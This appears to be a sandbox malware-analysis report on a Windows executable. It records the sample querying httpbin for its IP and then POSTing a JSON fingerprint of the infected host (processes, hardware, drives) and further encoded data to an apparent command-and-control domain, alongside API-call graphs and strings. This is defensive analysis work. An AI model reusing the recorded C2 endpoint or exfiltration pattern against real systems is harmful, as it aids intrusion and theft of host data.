                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.1249711185.121.15.192807012C:\Users\user\Desktop\CMpuGis28l.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 20, 2024 16:20:13.176632881 CET12360OUTPOST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1
                                                      Host: home.fivetk5ht.top
                                                      Accept: */*
                                                      Content-Type: application/json
                                                      Content-Length: 499685
                                                      Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 38 30 31 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                                      Data Ascii: { "ip": "8.46.123.189", "current_time": "1734708011", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 336 }, { "name": "csrss.exe", "pid": 420 }, { "name": "wininit.exe", "pid": 496 }, { "name": "csrss.exe", "pid": 504 }, { "name": "winlogon.exe", "pid": 580 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 760 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "fontdrvhost.exe", "pid": 792 }, { "name": "svchost.exe", "pid": 876 }, { "name": "svchost.exe", "pid": 928 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 372 }, { "name": "svchost.exe", "pid": 404 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": [TRUNCATED]
                                                      Dec 20, 2024 16:20:13.296833992 CET4944OUTData Raw: 34 71 31 63 4c 44 45 59 61 62 70 31 71 61 78 64 4c 67 65 65 46 6e 79 54 56 6e 4b 6e 56 6c 42 70 71 55 5a 4f 4d 6b 33 5c 2f 58 64 44 36 42 5c 2f 30 72 73 54 54 6f 56 61 50 68 56 4b 63 4d 54 51 70 59 6d 69 6e 78 74 34 63 77 71 54 6f 31 34 52 6e 53
                                                      Data Ascii: 4q1cLDEYabp1qaxdLgeeFnyTVnKnVlBpqUZOMk3\/XdD6B\/0rsTToVaPhVKcMTQpYminxt4cwqTo14RnSn7GfF8a0eeMk+WcIyV7Simmj8hKK\/X63\/4JOeILgkf8Ls0VCDgg+CL4kMP4T\/xUowcYPODyK\/MH4l+Cbn4a\/EPxt8Pru\/g1S58F+KNb8MzalbRSQQX76PqE9ibyKCVnkgS48kSiF3kMW7y\/Mk272\/RfB7
                                                      Dec 20, 2024 16:20:13.296952963 CET4944OUTData Raw: 42 46 5c 2f 77 41 5c 2f 55 31 44 75 65 52 66 6b 5c 2f 64 63 43 4c 79 78 2b 5c 2f 77 44 5c 2f 41 4f 43 5c 2f 7a 31 6f 4e 52 6a 62 50 6e 52 33 5c 2f 41 48 50 39 50 58 33 39 50 38 35 6f 5c 2f 69 32 66 75 5c 2f 33 6e 2b 71 5c 2f 65 2b 6e 2b 66 31 37
                                                      Data Ascii: BF\/wA\/U1DueRfk\/dcCLyx+\/wD\/AOC\/z1oNRjbPnR3\/AHP9PX39P85o\/i2fu\/3n+q\/e+n+f171JJ+72bJt7+b5ssn\/PH8u\/5YpPLj\/j+d\/+WUkn+v8A8\/yoOgD\/AAPv2eXF+6k\/0X+Xr2NVlkKsjv8A9O\/vP\/x9fXr9Ks+W7fx+ckn\/AC06fTOOKa8fzbEfzkEvf\/lj\/wDq\/wDr\/UAjEj+Y+\/zD
                                                      Dec 20, 2024 16:20:13.296973944 CET4944OUTData Raw: 4b 65 45 50 32 67 50 32 74 5c 2f 47 58 77 59 38 53 36 54 59 2b 44 76 68 6e 34 7a 31 4f 33 30 66 39 6e 50 78 4c 65 72 4a 5a 61 74 71 4f 71 36 63 6a 57 7a 61 58 34 34 65 34 75 48 74 59 4e 51 2b 49 55 69 74 71 58 68 65 43 42 4c 54 2b 79 62 5c 2f 41
                                                      Data Ascii: KeEP2gP2t\/GXwY8S6TY+Dvhn4z1O30f9nPxLerJZatqOq6cjWzaX44e4uHtYNQ+IUitqXheCBLT+yb\/AOx+Dp21nUtRtr9v1d8G\/tDfCD4g\/FP4n\/Bbwh4003WfiT8HhozePfDkHmrNpY1yDzoGt53RbbVBYO0dlrh06W5GhanPb6ZqptL2eKBv5w4u4K4m4Ixs8BxH4X5bhK1HJMBxFiJU58X4nD4bK8fUw2FhXxOIocT
                                                      Dec 20, 2024 16:20:13.297326088 CET7416OUTData Raw: 4c 48 62 51 33 75 6b 58 73 64 75 37 6d 53 61 43 50 62 5c 2f 61 43 32 51 59 53 53 48 49 79 45 55 79 2b 58 6a 39 75 64 43 68 2b 48 58 69 71 79 65 4b 30 31 48 53 5c 2f 46 46 74 66 32 73 6b 63 39 6a 63 79 77 7a 52 58 56 6e 63 78 4e 48 4e 48 50 70 55
                                                      Data Ascii: LHbQ3ukXsdu7mSaCPb\/aC2QYSSHIyEUy+Xj9udCh+HXiqyeK01HS\/FFtf2skc9jcywzRXVncxNHNHPpUwVp7S4hZ45Y7iGaCWMurblyK\/gz6SPHdLw940q4HNMqjnXD\/F2XcMZzjMBUoYyHtMTkWZYmhUjgswo4jDUcLi6+FwNPC4rnlXl9Uq0pSoaUZH+nv0P+Aa\/if4bvHZRmscj4o4Mzbi7IMDmsK+CqVMLg+IcswOM
                                                      Dec 20, 2024 16:20:13.297348022 CET2472OUTData Raw: 39 5c 2f 36 2b 76 72 54 50 38 41 67 63 61 66 38 74 66 74 48 72 33 39 76 54 5c 2f 4f 65 58 78 37 50 4d 7a 76 32 52 38 66 39 4e 36 5a 39 37 2b 50 59 5c 2f 6d 6d 4c 5c 2f 56 66 36 37 5c 2f 50 36 35 39 2b 51 36 42 6b 6d 5c 2f 35 4e 6a 78 76 2b 39 5c
                                                      Data Ascii: 9\/6+vrTP8Agcaf8tftHr39vT\/OeXx7PMzv2R8f9N6Z97+PY\/mmL\/Vf67\/P659+Q6Bkm\/5Njxv+9\/56\/l+HTpTPusn8f+xJ+XantseObf5ieZ\/2wx\/n\/wCvkU+P956o\/wDyyjkix\/n8fegCnJ\/eT6+V+Zx\/Lp+XepPMQSf6nyZp\/wB7n\/Xcdf8ARMZ\/zx6U7dtkTZNG6fn\/AI5\/pioVkMfnM6SfvP8An
                                                      Dec 20, 2024 16:20:13.416692972 CET4944OUTData Raw: 68 6e 2b 79 46 38 51 4c 44 77 4a 34 6c 2b 4a 6f 66 34 51 66 47 72 34 76 33 32 6f 36 66 38 50 64 4c 2b 49 30 58 6a 6e 34 4e 2b 42 37 6b 36 42 34 69 75 39 44 38 51 32 39 6e 34 70 38 41 77 65 50 4e 45 61 38 38 4f 36 74 59 43 37 4f 6f 43 77 74 62 5c
                                                      Data Ascii: hn+yF8QLDwJ4l+Jof4QfGr4v32o6f8PdL+I0Xjn4N+B7k6B4iu9D8Q29n4p8AwePNEa88O6tYC7OoCwtb\/AMp8L6xpfiyX4UJp\/iLwX9h+MPwu1j4y+GvEUusa7H4X0z4e+E9Q+I9h4\/1\/xJqc\/hKC9tLf4df8Km8e3fjB9I0rXIrSy0G4m0yXVi8KSfleD8b\/AAjx8HUwvHuR1IRo1cRJzqV6HLQo5VPPZ1ZKvRpNQlk
                                                      Dec 20, 2024 16:20:13.417248964 CET4944OUTData Raw: 70 4c 74 38 4c 66 67 53 50 72 70 50 78 45 50 38 41 4c 34 6a 4c 58 35 47 51 61 50 34 63 74 57 2b 4b 68 38 61 66 48 48 34 41 66 44 65 32 2b 43 57 70 5c 2f 43 50 77 6c 38 55 72 72 78 4e 72 66 78 70 38 52 52 2b 44 5c 2f 69 6a 38 59 72 62 78 37 64 61
                                                      Data Ascii: pLt8LfgSPrpPxEP8AL4jLX5GQaP4ctW+Kh8afHH4AfDe2+CWp\/CPwl8UrrxNrfxp8RR+D\/ij8Yrbx7daP8Ib1fhN8BPiW99498MJ8OfEMHjhtFXVPB+gakItEXxdfa5a61pmkZ1hpuj6l4I8J+KLP4s\/Ba68UfEP4b\/HT4u\/DX4Qw6p8Yx8SviH8PP2d9U+JGn\/EjxB4dmuvgZa\/DS0e3s\/hP4317SND8VfEjw34j1T
                                                      Dec 20, 2024 16:20:13.417380095 CET4944OUTData Raw: 38 38 74 30 32 66 38 73 76 33 73 6e 6d 5c 2f 77 44 6b 72 5c 2f 6e 36 30 6b 61 5c 2f 63 32 4c 73 63 79 35 38 75 54 6a 5c 2f 41 43 61 46 2b 5a 64 6d 2b 50 38 41 36 5a 65 5a 31 5c 2f 55 66 38 65 4e 61 65 30 38 76 78 5c 2f 34 41 48 36 5c 2f 66 48 72
                                                      Data Ascii: 88t02f8sv3snm\/wDkr\/n60ka\/c2Lscy58uTj\/ACaF+Zdm+P8A6ZeZ1\/Uf8eNae08vx\/4AH6\/fHrTLzWfg\/wCPtMsI\/OvLzQ3igjGfncXNs+PlDH7qnoDXnnxx\/aj+G\/xQ\/aa8Y\/GL4haN4Zl+D3wa\/wCClnw8\/aL8FeH\/AIa\/ApPAcH7bn7NureI7bQPGGhfGTwb4Y8DeB9G+IHxs+Dvh\/T77xN8NfHP7
                                                      Dec 20, 2024 16:20:13.458772898 CET27192OUTData Raw: 68 5a 34 31 35 68 34 64 2b 4a 4f 50 38 53 59 34 44 44 35 76 6d 4f 5a 59 66 69 4c 44 34 6e 43 34 6d 74 57 6f 77 35 75 49 71 64 53 47 49 71 77 71 55 4b 6c 44 45 55 36 6c 42 31 6e 4b 68 4f 6a 57 6f 31 71 55 34 77 6e 53 72 55 36 6b 49 79 58 79 66 72
                                                      Data Ascii: hZ415h4d+JOP8SY4DD5vmOZYfiLD4nC4mtWow5uIqdSGIqwqUKlDEU6lB1nKhOjWo1qU4wnSrU6kIyXyfr93b+Kf2WPgx8I\/BPxl\/YzHiH4K\/Df49eHfGHw+8U\/sxeNdQ+Nes+LtT\/ax+Mfxf8AB1z8C\/2gNU\/Yh1fUfCfgvxb4N8QeFdQg8P2Px3+ENlbS3+rab4n8N6NfXetRT0fjJqnwW8TaB\/wUW8a6drXwf+IV
                                                      Dec 20, 2024 16:20:13.578219891 CET7416OUTData Raw: 75 35 66 33 48 34 5c 2f 5c 2f 71 5c 2f 72 54 5c 2f 4a 78 49 6e 6e 4a 73 54 5c 2f 57 39 66 33 5c 2f 41 50 31 37 65 32 65 6e 38 71 66 35 65 33 59 6a 70 38 6e 6c 66 75 70 4a 50 39 52 42 31 5c 2f 6e 2b 74 42 30 46 62 61 37 4b 36 66 76 45 53 54 39 36
                                                      Data Ascii: u5f3H4\/\/q\/rT\/JxInnJsT\/W9f3\/AP17e2en8qf5e3Yjp8nlfupJP9RB1\/n+tB0Fba7K6fvEST96I7fv259f6+nrCwf+P5E\/1UQj9Ov4n\/Iq15PHyfc8ryvs+f8AR5un+f8A63FQfJ5fzvsf\/W9fP\/X0xx+HNBt7\/wDd\/Eh\/uO77H\/5ZY7+\/+c\/h3Z\/f2fP\/ALf\/AD261NJ+73pI\/wAkn\/PT\/lj\/
                                                      Dec 20, 2024 16:20:14.473885059 CET212INHTTP/1.0 503 Service Unavailable
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.1249712185.121.15.192807012C:\Users\user\Desktop\CMpuGis28l.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 20, 2024 16:20:15.325867891 CET284OUTPOST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1
                                                      Host: home.fivetk5ht.top
                                                      Accept: */*
                                                      Content-Type: application/json
                                                      Content-Length: 143
                                                      Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                      Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
                                                      Dec 20, 2024 16:20:16.608032942 CET212INHTTP/1.0 503 Service Unavailable
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                      HTTPS Proxied Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.124971098.85.100.804437012C:\Users\user\Desktop\CMpuGis28l.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-12-20 15:20:11 UTC52OUTGET /ip HTTP/1.1
                                                      Host: httpbin.org
                                                      Accept: */*
                                                      2024-12-20 15:20:11 UTC224INHTTP/1.1 200 OK
                                                      Date: Fri, 20 Dec 2024 15:20:11 GMT
                                                      Content-Type: application/json
                                                      Content-Length: 31
                                                      Connection: close
                                                      Server: gunicorn/19.9.0
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Allow-Credentials: true
                                                      2024-12-20 15:20:11 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                      Data Ascii: { "origin": "8.46.123.189"}


                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:10:20:06
                                                      Start date:20/12/2024
                                                      Path:C:\Users\user\Desktop\CMpuGis28l.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\CMpuGis28l.exe"
                                                      Imagebase:0xf70000
                                                      File size:4'480'512 bytes
                                                      MD5 hash:B6AA4B3886F2272B307DF8DEE7426A4F
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      Disassembly

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:4.7%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:22.3%
                                                        Total number of Nodes:215
                                                        Total number of Limit Nodes:30
                                                        execution_graph 25339 f731d7 25342 f731f4 25339->25342 25340 f73200 25341 f732dc CloseHandle 25341->25340 25342->25340 25342->25341 25343 f72f17 25350 f72f2c 25343->25350 25344 f731d3 25345 f72fb3 RegOpenKeyExA 25345->25350 25346 f7315c RegEnumKeyExA 25346->25350 25347 f73046 RegOpenKeyExA 25348 f73089 RegQueryValueExA 25347->25348 25347->25350 25349 f7313b RegCloseKey 25348->25349 25348->25350 25349->25350 25350->25344 25350->25345 25350->25346 25350->25347 25350->25349 25351 1024720 25352 1024728 25351->25352 25356 1024733 25352->25356 25357 1029270 25352->25357 25354 1024860 25360 1024950 25354->25360 25364 102a440 25357->25364 25359 1029297 25359->25354 25361 1024966 25360->25361 25362 10249c5 25361->25362 25363 1024aa0 gethostname 25361->25363 25362->25356 25363->25361 25363->25362 25365 102a46b 25364->25365 25366 102a48b GetAdaptersAddresses 25365->25366 25399 102a4db 25365->25399 25382 102a4a6 25366->25382 25398 102a53f 25366->25398 25367 102aa03 RegOpenKeyExA 25368 102ab70 RegOpenKeyExA 25367->25368 25369 102aa27 RegQueryValueExA 25367->25369 25370 102ac34 RegOpenKeyExA 25368->25370 25396 102ab90 25368->25396 25371 102aa71 25369->25371 25372 102aacc RegQueryValueExA 25369->25372 25373 102acf8 RegOpenKeyExA 25370->25373 25395 102ac54 25370->25395 25371->25372 25378 102aa85 RegQueryValueExA 25371->25378 25374 102ab66 RegCloseKey 25372->25374 25375 102ab0e 25372->25375 25376 102ad56 RegEnumKeyExA 25373->25376 25384 102ad14 25373->25384 25374->25368 25375->25374 25383 102ab1e RegQueryValueExA 25375->25383 25379 102ad9b 25376->25379 25376->25384 25377 102a4f3 GetAdaptersAddresses 25380 102a505 25377->25380 25377->25398 25381 102aab3 25378->25381 25385 102ae16 RegOpenKeyExA 25379->25385 25389 102a527 GetAdaptersAddresses 25380->25389 25380->25399 25381->25372 25382->25377 25382->25399 25388 102ab4c 25383->25388 25384->25359 25386 102ae34 RegQueryValueExA 25385->25386 25387 102addf RegEnumKeyExA 25385->25387 25390 102af43 RegQueryValueExA 25386->25390 25400 102adaa 25386->25400 25387->25384 25387->25385 25388->25374 25389->25398 25389->25399 25391 102b052 RegQueryValueExA 25390->25391 25390->25400 25392 102adc7 RegCloseKey 25391->25392 25391->25400 25392->25387 25393 102a794 GetBestRoute2 25393->25398 25394 102afa0 RegQueryValueExA 25394->25400 25395->25373 25396->25370 25397 102a6c7 GetBestRoute2 25397->25398 25398->25393 25398->25397 25398->25399 25399->25367 25399->25384 25400->25390 25400->25391 25400->25392 25400->25394 25272 103a080 25275 1039740 25272->25275 25274 103a09b 25276 1039780 25275->25276 25280 103975d 25275->25280 25277 1039925 RegOpenKeyExA 25276->25277 25276->25280 25278 103995a RegQueryValueExA 25277->25278 25277->25280 25279 1039986 RegCloseKey 25278->25279 25279->25280 25280->25274 25281 103b180 25284 103b19b 25281->25284 25288 103b2e3 25281->25288 25285 103b2a9 getsockname 25284->25285 25287 103b020 closesocket 25284->25287 25284->25288 25289 103af30 25284->25289 25293 103b060 25284->25293 25298 103b020 25285->25298 25287->25284 25290 103af63 socket 25289->25290 25291 103af4c 25289->25291 25290->25284 25291->25290 25292 103af52 25291->25292 25292->25284 25296 103b080 25293->25296 25294 103b0b0 connect 25295 103b0bf WSAGetLastError 25294->25295 25295->25296 25297 103b0ea 25295->25297 25296->25294 25296->25295 25296->25297 25297->25284 25299 103b052 25298->25299 25300 103b029 25298->25300 25299->25284 25301 103b04b closesocket 25300->25301 25302 103b03e 25300->25302 25301->25299 25302->25284 25303 103a8c0 25304 103a903 recvfrom 25303->25304 25305 103a8e6 25303->25305 25306 103a8ed 25304->25306 25305->25304 25305->25306 25401 103a920 25403 103a944 25401->25403 25402 103a94b 25403->25402 25404 103a977 send 25403->25404 25307 f729ff FindFirstFileA 25308 f72a31 25307->25308 25309 f72a5c RegOpenKeyExA 25308->25309 25310 f72a93 25309->25310 25311 f72ade CharUpperA 25310->25311 25312 f72b0a 25311->25312 25313 f72bf9 QueryFullProcessImageNameA 25312->25313 25314 f72c3b CloseHandle 25313->25314 25315 f72c64 25314->25315 25316 f72df1 CloseHandle 25315->25316 25317 f72e23 25316->25317 25405 f73d5e 25408 f73d30 25405->25408 25407 f73d90 25408->25405 25408->25407 25409 f80ab0 25408->25409 25412 f805b0 25409->25412 25411 f80acd 25411->25408 25413 f805bd 25412->25413 25416 f807c7 25412->25416 25414 f80707 WSAEventSelect 25413->25414 25415 f807ef 25413->25415 25413->25416 25426 f776a0 25413->25426 25414->25413 25414->25416 25415->25416 25421 f80847 25415->25421 25422 f86fa0 25415->25422 25416->25411 25419 f809e8 WSAEnumNetworkEvents 25420 f809d0 WSAEventSelect 25419->25420 25419->25421 25420->25419 25420->25421 25421->25416 25421->25419 25421->25420 25423 f86feb 25422->25423 25425 f86fd4 25422->25425 25423->25421 25424 f87207 select 25424->25423 25425->25423 25425->25424 25427 f776e6 send 25426->25427 25428 f776c0 25426->25428 25429 f776c9 25427->25429 25428->25427 25428->25429 25429->25413 25318 fa95b0 25319 fa95c8 25318->25319 25320 fa95fd 25318->25320 25319->25320 25322 faa150 25319->25322 25323 faa15f 25322->25323 25325 faa1d0 25322->25325 25324 faa181 getsockname 25323->25324 25323->25325 25324->25325 25325->25320 25430 fa8b50 25431 fa8b6b 25430->25431 25445 fa8bb5 25430->25445 25431->25445 25446 fa8b8f 25431->25446 25447 faa550 25431->25447 25433 fa8bfc 25435 fa8c1f connect 25433->25435 25436 fa8c35 25433->25436 25443 fa8cb2 25433->25443 25433->25445 25434 fa8cd9 SleepEx 25440 fa8d13 25434->25440 25435->25436 25439 faa150 getsockname 25436->25439 25437 faa150 getsockname 25442 fa8dff 25437->25442 25439->25446 25441 fa8d43 25440->25441 25440->25443 25444 faa150 getsockname 25441->25444 25442->25445 25460 f778b0 closesocket 25442->25460 25443->25437 25443->25442 25443->25445 25444->25445 25446->25434 25446->25443 25446->25445 25448 faa575 25447->25448 25450 faa597 25448->25450 25462 f775e0 25448->25462 25453 faa811 setsockopt 25450->25453 25458 faa83b 25450->25458 25459 faa69b 25450->25459 25451 f778b0 closesocket 25452 faa713 25451->25452 25452->25433 25453->25458 25455 faaf56 25456 faaf5d 25455->25456 25455->25459 25456->25452 25457 faa150 getsockname 25456->25457 25457->25452 25458->25459 25467 fd67e0 ioctlsocket 25458->25467 25459->25451 25459->25452 25461 f778c5 25460->25461 25461->25445 25463 f77607 socket 25462->25463 25464 f775ef 25462->25464 25465 f7762b 25463->25465 25464->25463 25466 f77643 25464->25466 25465->25450 25466->25450 25467->25455 25468 f7255d 25469 12f9f70 25468->25469 25470 f7256c GetSystemInfo 25469->25470 25471 f72589 25470->25471 25472 f725a0 GlobalMemoryStatusEx 25471->25472 25479 f725ec 25472->25479 25473 f7263c GetDriveTypeA 25475 f72655 GetDiskFreeSpaceExA 25473->25475 25473->25479 25474 f72762 25476 f727d6 KiUserCallbackDispatcher 25474->25476 25475->25479 25477 f727f8 25476->25477 25478 f72842 SHGetKnownFolderPath 25477->25478 25480 f728c3 25478->25480 25479->25473 25479->25474 25481 f728d9 FindFirstFileW 25480->25481 25482 f72906 FindNextFileW 25481->25482 25483 f72928 25481->25483 25482->25482 25482->25483 25326 f8d5e0 25327 f8d652 WSAStartup 25326->25327 25328 f8d5f0 25326->25328 25327->25328 25329 f720ad 25330 f720d9 25329->25330 25331 f720e3 25330->25331 25333 12fb160 Sleep 25330->25333 25333->25330 25484 fab3c0 25485 fab3cb 25484->25485 25486 fab3ee 25484->25486 25488 f776a0 send 25485->25488 25490 fa9290 25485->25490 25487 fab3ea 25488->25487 25491 f776a0 send 25490->25491 25492 fa92e5 25491->25492 25493 fa9335 WSAIoctl 25492->25493 25495 fa9392 25492->25495 25494 fa9366 25493->25494 25493->25495 25494->25495 25496 fa9371 setsockopt 25494->25496 25495->25487 25496->25495 25497 fab400 25498 fab40b 25497->25498 25499 fab425 25497->25499 25502 f77770 25498->25502 25500 fab421 25503 f777b6 recv 25502->25503 25504 f77790 25502->25504 25505 f77799 25503->25505 25504->25503 25504->25505 25505->25500 25334 12fd1b0 25337 12fd1cd 25334->25337 25335 12fd4e4 localeconv 25335->25337 25336 12fc9a0 localeconv 25336->25337 25337->25335 25337->25336 25338 12fd38e 25337->25338

                                                        Executed Functions

                                                        Function 00FAF100 Relevance: 20.1, Strings: 15, Instructions: 1304COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        • Associated: 00000000.00000002.2531183229.0000000000F70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531648796.00000000016B6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001950000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531959352.0000000001A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532071843.0000000001C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532093424.0000000001C03000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                                        • API String ID: 0-1590685507
                                                        • Opcode ID: 69e8d8c9b225b38a332464ad0fc6385de1c19879421a87cccdc577fcd1b8b004
                                                        • Instruction ID: 22995a400968bd61dd772dfb0e2cab0a69056c2ce3106bbf13a8b34192351952
                                                        • Opcode Fuzzy Hash: 69e8d8c9b225b38a332464ad0fc6385de1c19879421a87cccdc577fcd1b8b004
                                                        • Instruction Fuzzy Hash: D7C2B171A043449FD724DF69C484B6AB7E1BF89324F04866DEC989F262D770ED88DB81
                                                        Function 00F7255D Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 282fileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSystemInfo.KERNELBASE ref: 00F72579
                                                        • GlobalMemoryStatusEx.KERNELBASE ref: 00F725CC
                                                        • GetDriveTypeA.KERNELBASE ref: 00F72647
                                                        • GetDiskFreeSpaceExA.KERNELBASE ref: 00F7267E
                                                        • KiUserCallbackDispatcher.NTDLL ref: 00F727E2
                                                        • SHGetKnownFolderPath.SHELL32 ref: 00F7286D
                                                        • FindFirstFileW.KERNELBASE ref: 00F728F8
                                                        • FindNextFileW.KERNELBASE ref: 00F7291F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        • Associated: 00000000.00000002.2531183229.0000000000F70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmpDownload File
